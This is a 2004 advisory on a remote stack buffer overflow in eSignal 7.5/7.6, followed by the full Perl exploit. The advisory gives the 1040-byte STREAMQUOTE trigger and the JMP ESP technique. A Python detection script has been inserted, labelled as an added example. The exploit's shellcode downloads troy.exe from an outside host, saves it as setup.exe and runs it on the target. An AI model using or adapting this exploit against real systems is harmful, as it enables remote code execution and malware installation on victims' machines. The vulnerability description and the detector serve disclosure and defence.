eSignal v7 remote buffer overflow (exploit)
Source: vfocus.net  Author: vitter  Published: 2004-03-26

Product: eSignal 7.6, 7.5 (maybe earlier)
http://www.esignal.com

Systems: Windows (all versions)

Problem: Stack-based buffer overflow

Severity: Remote code execution

Risk: High
-----------------------------------------------------------------------------

Product description:
~~~~~~~~~~~~~~~~~~~~
"eSignal is the nation's leading provider of real-time financial and
market information. eSignal is a popular platform for institutional
and professional traders. eSignal is a market data solution bundled
for best value for small to mid-size institutional investors that
also includes additional optional services..."


Vulnerability:
~~~~~~~~~~~~~~
The eSignal main application "WinSig.exe" listens for incoming data
requests on TCP port 80.

While parsing requests, it suffers from a classic stack-based buffer
overflow when the parameter string is about 1040 characters long:

C:\>telnet localhost 80
<STREAMQUOTE>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....... x 1040
</STREAMQUOTE>

... bang!

The overflow occurs in Specs.dll and EIP is fully controllable, as
the function return address on the stack is completely overwritten.
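As an added example (not part of the original advisory or its exploit), a small Python check a defender could run over captured port-80 payloads to spot requests matching the pattern above; the tag names come from the advisory, while the function names and the 1000-byte threshold are assumptions:

```python
# Added example (not part of the original advisory): flag <STREAMQUOTE> requests
# that look like the overflow described above. Names and thresholds are assumptions.
OPEN_TAG, CLOSE_TAG = b"<STREAMQUOTE>", b"</STREAMQUOTE>"
SUSPECT_LEN = 1000  # assumption: alert below the ~1040-byte trigger, not at it


def extract_param(payload: bytes):
    """Return the bytes between the STREAMQUOTE tags, or None if no request.
    A missing closing tag is treated as 'everything after the opening tag' so a
    truncated or unterminated request is still inspected."""
    start = payload.find(OPEN_TAG)
    if start < 0:
        return None
    start += len(OPEN_TAG)
    end = payload.find(CLOSE_TAG, start)
    return payload[start:] if end < 0 else payload[start:end]


def inspect_request(payload: bytes) -> dict:
    """Classify one captured TCP payload sent to the eSignal listener."""
    param = extract_param(payload)
    if param is None:
        return {"streamquote": False, "suspicious": False, "reasons": []}
    reasons = []
    if len(param) >= SUSPECT_LEN:
        reasons.append(f"parameter length {len(param)} >= {SUSPECT_LEN}")
    # A symbol request is short printable ASCII; NOP sleds and opcodes are not.
    if any(b < 0x20 or b > 0x7E for b in param):
        reasons.append("non-printable bytes in parameter")
    return {"streamquote": True, "suspicious": bool(reasons), "reasons": reasons}


def scan_capture(payloads):
    """Return (index, reasons) for every payload that trips a check."""
    hits = []
    for i, p in enumerate(payloads):
        verdict = inspect_request(p)
        if verdict["suspicious"]:
            hits.append((i, verdict["reasons"]))
    return hits


if __name__ == "__main__":
    # Constructed sample traffic: a benign quote request, an oversize request
    # (the advisory's 1040 'A's) and a short request carrying NOP bytes.
    samples = [
        b"<STREAMQUOTE>MSFT</STREAMQUOTE>\r\n",
        b"<STREAMQUOTE>" + b"A" * 1040 + b"</STREAMQUOTE>",
        b"<STREAMQUOTE>" + b"\x90" * 16 + b"IBM</STREAMQUOTE>",
    ]
    for idx, why in scan_capture(samples):
        print(f"payload {idx}: {'; '.join(why)}")
```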


Exploitation:
~~~~~~~~~~~~~
Pretty trivial, except that the overflow string cannot contain NULL bytes
and all lower-case characters are converted to upper-case.

As we overwrite the stack with the return address and code, we use the
standard "JMP ESP" technique to direct execution back to our buffer.

A "jmp esp" opcode was found in MFC71.dll, which is distributed in the
eSignal package and loaded from the program folder, thus making the exploit
eSignal-version specific instead of OS (Windoze) specific.

While I was working on the advisory, eSignal released v7.6, which is
vulnerable as well and even more "overflow-friendly", as the previous
version was compiled with debug bits for ESP value checking at the end of
each procedure. But in both cases it's almost the same.


Proof of concept code:
~~~~~~~~~~~~~~~~~~~~~~
The exploit, written in Perl, downloads and executes a file from the
specified URL. It is available here:

http://viziblesoft.com/insect/sploits/vz-eSignal76.pl


Solution:
~~~~~~~~~
The vendor's technical support ignored my request for the company's security
contacts. I wasn't surprised, as most support staff these days are
zombified and can't figure out how to do something they were not programmed
to. Plus, the company falls into the category of "those who do not care"
moneymakers, so after two weeks I realized there wouldn't be
any answer.

Thus, the solution is obvious:

Close TCP 80 to the outside world with your favorite firewall.


Disclaimer:
~~~~~~~~~~~
The information in this advisory is believed to be true though
it may be false. Use of this information constitutes acceptance for use
in an AS IS condition. There are NO warranties with regard to this
information. In no event shall the authors be liable for any damages
whatsoever arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.

Legal Notice:
~~~~~~~~~~~~~
This advisory is copyright (c) 2004 VizibleSoft.com
You may distribute it unmodified. You may not modify it and distribute
it or distribute parts of it without the author's written permission -
this especially applies to the so called "vulnerabilities databases"
and "security checkers".
-----------------------vz-eSignal76.pl--------------------------------
#!/usr/bin/perl
#
# eSignal v7.6 remote exploit (c) VizibleSoft =*= http://viziblesoft.com/insect
#
# 25-Mar-2004
#

use IO::Socket;

sub usage
{
die("\nUsage: perl $0 host port\n");
}

print "\r\neSignal v7.6 remote exploit, (c) VizibleSoft.com\r\n";

my $ip = $ARGV[0] || usage();
my $port = $ARGV[1] || usage();
my $data = "";
my $ret = "\xf3\x7b\x20\x7c"; # MFC71.dll "jmp esp"
my $nop = "\x90";

#
# Used api..
#

$api = "\x00wininet.dll\x00InternetOpenA\x00".
"InternetOpenUrlA\x00InternetReadFile\x00kernel32.dll\x00".
"_lcreat\x00_lwrite\x00_lclose\x00";

#
# Url of file to execute
#

$url = "http://viziblesoft.com/insect/sploits/troy.exe";

#
#
# Filename for our file on remote system

$fname = "setup.exe";

#
#
# Shellcode: downloads and executes file at URL
#

$shellc = "\x90".
"\x8B\xEC\x03\xEA\xB8\xEA\xFE\xFF\xFF\xF7\xD0\x03\xE8\x83\xC5\x0B\x8B\xFD\x4F\xF7".
"\x17\x83\xC7\x04\x83\x3F\xFF\x7C\xF6\xF7\x17\xB8\x5C\x12\x14\x7C\x8B\x18\x55\xFF".
"\xD3\x8B\xF8\x33\xC9\xB1\x03\x8D\x55\x0C\xB8\x58\x12\x14\x7C\x8B\x18\x51\x52\x52".
"\x57\xFF\xD3\x5A\x59\x89\x02\x83\xC2\x03\x42\x8A\x02\x3A\xC5\x7F\xF9\x42\xFE\xC9".
"\x3A\xCD\x7F\xDE\xB8\x5C\x12\x14\x7C\x8B\x18\x8D\x55\x3C\x52\xFF\xD3\x8B\xF8\xB8".
"\x58\x12\x14\x7C\x8B\x18\x53\x8D\x55\x49\x52\x52\x57\xFF\xD3\x5A\x89\x02\x8B\x1C".
"\x24\x8D\x55\x51\x52\x52\x57\xFF\xD3\x5A\x89\x02\x5B\x8D\x55\x59\x52\x52\x57\xFF".
"\xD3\x5A\x89\x02\x33\xD2\x52\x52\x52\x52\x55\xFF\x55\x0C\x33\xD2\x52\xB6\x80\xC1".
"\xE2\x10\x52\x33\xD2\x52\x52\x8D\x4D\x60\x41\x51\x50\xFF\x55\x1A\x89\x45\x1A\x33".
"\xD2\x52\x8D\x55\xF6\x52\xFF\x55\x49\x89\x45\x49\x33\xD2\xB6\x02\x2B\xE2\x83\xEC".
"\x04\x33\xD2\xB6\x02\x54\x8B\xC4\x83\xC0\x08\x52\x50\x8B\x45\x1A\x50\xFF\x55\x2B".
"\x8B\x04\x24\x8D\x54\x24\x04\x50\x52\x8B\x45\x49\x50\xFF\x55\x51\x83\x3C\x24\x01".
"\x7D\xD7\x8B\x45\x49\x50\xFF\x55\x59\x8D\x55\xF6\x52\xB8\x3F\x0E\x81\xF8\x35\x80".
"\x80\x80\x80\xFF\xD0\xB8\xD3\xFC\x80\xF8\x35\x80\x80\x80\x80\xFF\xE0$fname";

$movsb = "\x90\x33\xc9\xb5\x02\xb1\xcc\x8b\xf4\x2b\xf1\x8b\xfc\x33\xd2\xb2\x15\x03\xfa\xf3\xa4";

#
# xor data block
#

$url = $api . $url;
for(my $i=0; $i<length($url); $i++) {
$data = $data . (substr($url, $i, 1) ^ "\xff");
};

$data .= "\xff\xff\xfe\xfe\xff\xff\xff\xff";

#
# construct overflow string...
#

$shellc .= $data;
$shellc .= ("\xcc" x (712 - length($shellc)));

$shellcode = $nop x (8 * 16) .
$shellc .
$ret .
$movsb .
$nop x (191-16);


# print "shellcode len: " . length($shellcode) . "\r\n";

$data = '<STREAMQUOTE>' . $shellcode . '</STREAMQUOTE>';

# print "sending data of len: " . length($data) . "\n";

print sendraw($data);

print "[+] Overflow sent / file executed!\n";
exit;

sub sendraw {
    my ($pstr) = @_;
    my $target;
    $target = inet_aton($ip) || die("[-] inet_aton problems");
    socket(S, 2, 1, getprotobyname('tcp') || 0) || die("[-] Socket problems\n");
    if (connect(S, pack "SnA4x8", 2, $port, $target)) {
        select(S); $| = 1;
        print $pstr; my @in = <S>;
        select(STDOUT); close(S);
        return @in;
    } else { die("[-] Can't connect...\n"); }
}
---------END--------------


